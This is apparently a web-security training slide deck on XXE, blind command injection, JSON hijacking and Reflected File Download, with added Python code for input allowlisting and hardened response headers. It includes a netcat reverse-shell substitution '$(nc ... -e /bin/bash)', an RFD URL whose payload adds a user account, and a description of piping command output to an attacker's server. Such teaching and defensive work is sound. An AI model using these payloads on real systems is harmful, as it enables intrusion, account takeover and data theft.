6.
• XXE (XML External Entity Injection)
According to OWASP:
An XML External Entity attack is a type of injection attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data.

10.
• XXE (XML External Entity Injection)
I am leaving out the rest of the process. As per the "testing.php" response, we added a GET parameter called "ping" and, as you can see, we were able to execute commands.
This is a scenario where the target system has some beta-testing application that is under development. You should figure out what you can do with XXE or any other vulnerability.

15.
Blind RCE (Blind Remote/OS Command Execution)
According to nature/behaviour:
Similar to, or the elder brother of, the Blind SQL Injection vulnerability.
According to OWASP:
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.

16.
Blind RCE (Blind Remote/OS Command Execution)
Why does RCE take place?
Missing or insufficient sanitization of user input that is appended to a system shell command at execution time.

18.
Blind RCE (Blind Remote/OS Command Execution)
Some basics about chaining commands:
• A; B = Run A and then B, regardless of whether A succeeded
• A || B = Run B only if A failed; A runs in any case
• A && B = Run B only if A succeeded; if A fails, B will not execute
• A & B = Run A in the background and B right after it; if A fails, B still executes
• A | B = Run A and pass the output of A to B as its input
• A %0a B = A URL-encoded newline (%0a) separates the two commands; useful for web apps
• $(nc -nv ip port -e /bin/bash) = command substitution: the inner command runs and its output replaces the expression

21.
Blind RCE (Blind Remote/OS Command Execution)
In the demonstration, we assume the target server is configured in such a way that it will not send a reverse connection using the netcat -e option, and we cannot use wget either.
The response from the command "id" gets logged in our Python simple HTTP server.
Let's see whether we are able to access the /var/tmp folder. Yes we are, because in the Python server we got the response /var/tmp.
Using a similar kind of approach, we can interact with the shell response. Remember, we are not using the netcat -e option for the response; we are just piping the output to another machine.

22.
Blind RCE (Blind Remote/OS Command Execution)
Fixing the Command Execution
• The developer should scrub all input for malicious characters.
• It is much easier to define the legal characters than the illegal characters.
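As an added illustration of the second bullet (not code from the slides), here is a Python allowlist check for a "ping"-style host parameter like the one in the earlier demo, with the vulnerable string-concatenation pattern beside the hardened argv form. The host regex and the function names are my own assumptions; only the chaining operators from the previous slide are taken from the page.

```python
import re
import subprocess

# Allowlist: define the legal characters (letters, digits, dot, hyphen) instead
# of trying to enumerate the illegal ones (; | & $ ( ) ` newline, %0a once decoded).
# The first character must be alphanumeric so a value cannot start with "-" and
# be read by ping as an option. Assumed pattern; adjust to your input format.
_HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def is_safe_host(value: str) -> bool:
    """True only if the value is a plausible hostname/IPv4 literal per the allowlist."""
    return _HOST_RE.fullmatch(value) is not None


def vulnerable_ping_command(host: str) -> str:
    """The pattern behind blind RCE: untrusted input spliced into a shell command line.
    Running this string with shell=True hands every metacharacter in `host` to the
    shell. Shown for contrast only; never execute it."""
    return "ping -c 1 " + host


def build_ping_argv(host: str) -> list:
    """Hardened form: validate first, then pass the value as a single argv element
    so no shell ever parses it (run_ping uses shell=False)."""
    if not is_safe_host(host):
        raise ValueError("ping parameter rejected by allowlist")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> int:
    """Execute the hardened command without a shell; returns ping's exit status."""
    argv = build_ping_argv(host)
    completed = subprocess.run(argv, capture_output=True, timeout=10)
    return completed.returncode


if __name__ == "__main__":
    # Constructed inputs: one benign host, the rest carry the chaining operators
    # from the earlier slide (";", "||", "&&", "&", "|", "%0a" decoded to "\n", "$()").
    samples = ["8.8.8.8", "8.8.8.8; id", "x || id", "x && id",
               "x & id", "x | id", "x\nid", "$(id)", "-f"]
    for s in samples:
        print(repr(s), "->", "accepted" if is_safe_host(s) else "rejected")
```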

24.
JSON Response Hijacking
According to sources:
Similar to CSRF, this vulnerability is basically based on a browser bug which allows an attacker to steal a sensitive JSON response from a victim's authenticated session, or there could be more interesting things.

29.
Reflected File Download
According to sources:
RFD is a web attack vector that enables attackers to gain complete control over a victim's machine by virtually downloading a file from a trusted domain.
Recently found in Facebook, Google, etc. by researchers.
Source: https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf

30.
Reflected File Download
Let's separate those words:
Reflected: the value given in the URL should be reflected in the response.
Filename: the filename handling should be permissive (allowing great or excessive freedom), i.e. it should also accept additional user-controlled values and file type. For example, the application may accept a filename between the first slash "/" and the "?" character.
Ex. Code (PHP)
(Will Not Work)

31.
Reflected File Download
Let's separate those words:
Download:
https://anyvulnerablewebsite.com/json;/maliciousfile.bat/.exe?download=anycomm
and "malicious.bat/,exe"
So basically this is browser behaviour: how the browser handles the download process. The behaviour mentioned is for Chrome; other browsers may handle the same thing differently.

32.
Reflected File Download
Attack scenario:
1. The attacker sends the victim a malicious URL on a trusted domain.
Ex.
http://anytrustedsite.com/apitest/search;setup.bat?term=f00bar&callback=net user attacker attacker
2. The victim sees that the domain is trusted, so they access the URL.
3. After clicking the URL, the file is downloaded, and after executing that file, some interesting things will happen ;)
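As an added example (not from the slides or the cited paper), here is a Python sketch of a callback-reflecting search endpoint like the one in the scenario, with the RFD-prone response beside a hardened one and a small checker for the two preconditions the slides name (no server-set filename, reflected input). The function names, the identifier regex and the sample inputs are my own; the headers are standard HTTP.

```python
import json
import re

# A JSONP callback must be a plain JavaScript identifier; anything else
# ("net user attacker attacker", spaces, shell metacharacters) is rejected.
_CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]{0,63}$")


def is_valid_callback(callback: str) -> bool:
    """Allowlist check for the reflected parameter."""
    return _CALLBACK_RE.fullmatch(callback) is not None


def build_response_vulnerable(callback: str, term: str) -> dict:
    """RFD-prone: the callback is reflected verbatim and no filename is set, so the
    browser derives the download name from the URL path (e.g. ";setup.bat")."""
    body = f"{callback}({json.dumps({'term': term})});"
    return {"status": 200, "headers": {"Content-Type": "application/json"}, "body": body}


def build_response_hardened(callback: str, term: str) -> dict:
    """Hardened: validate the callback, pin the filename with Content-Disposition so
    the URL path cannot choose it, and stop MIME sniffing with nosniff."""
    headers = {"Content-Type": "application/json; charset=utf-8",
               "Content-Disposition": 'attachment; filename="search.json"',
               "X-Content-Type-Options": "nosniff"}
    if not is_valid_callback(callback):
        return {"status": 400, "headers": headers,
                "body": json.dumps({"error": "invalid callback"})}
    body = f"{callback}({json.dumps({'term': term})});"
    return {"status": 200, "headers": headers, "body": body}


def rfd_exposure(response: dict) -> list:
    """Defender check: which RFD preconditions does this response still satisfy?"""
    findings = []
    disposition = response["headers"].get("Content-Disposition", "")
    if "filename=" not in disposition:
        findings.append("no server-set filename: URL path controls the download name")
    if response["headers"].get("X-Content-Type-Options", "").lower() != "nosniff":
        findings.append("no nosniff header: content may be sniffed as executable text")
    return findings


if __name__ == "__main__":
    # Constructed request values taken from the scenario URL above.
    print(rfd_exposure(build_response_vulnerable("net user attacker attacker", "f00bar")))
    print(rfd_exposure(build_response_hardened("handleSearch", "f00bar")))
```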

34.
Reflected File Download
As you can see, we have a web application. The value of the download parameter is echoed back in the response without a filename header, and the response is downloadable.

35.
Reflected File Download
Now we are going to enter a filename in the URL. Because the response headers don't include a filename header, we have a chance to control the filename from the URL itself.

36.
Reflected File Download
Now we can craft a payload as input which will execute some system command on the victim's machine. Based on the reflection, we can separate out the rest of the value to perform command execution.

37.
Reflected File Download
After executing that file, we have calc execution.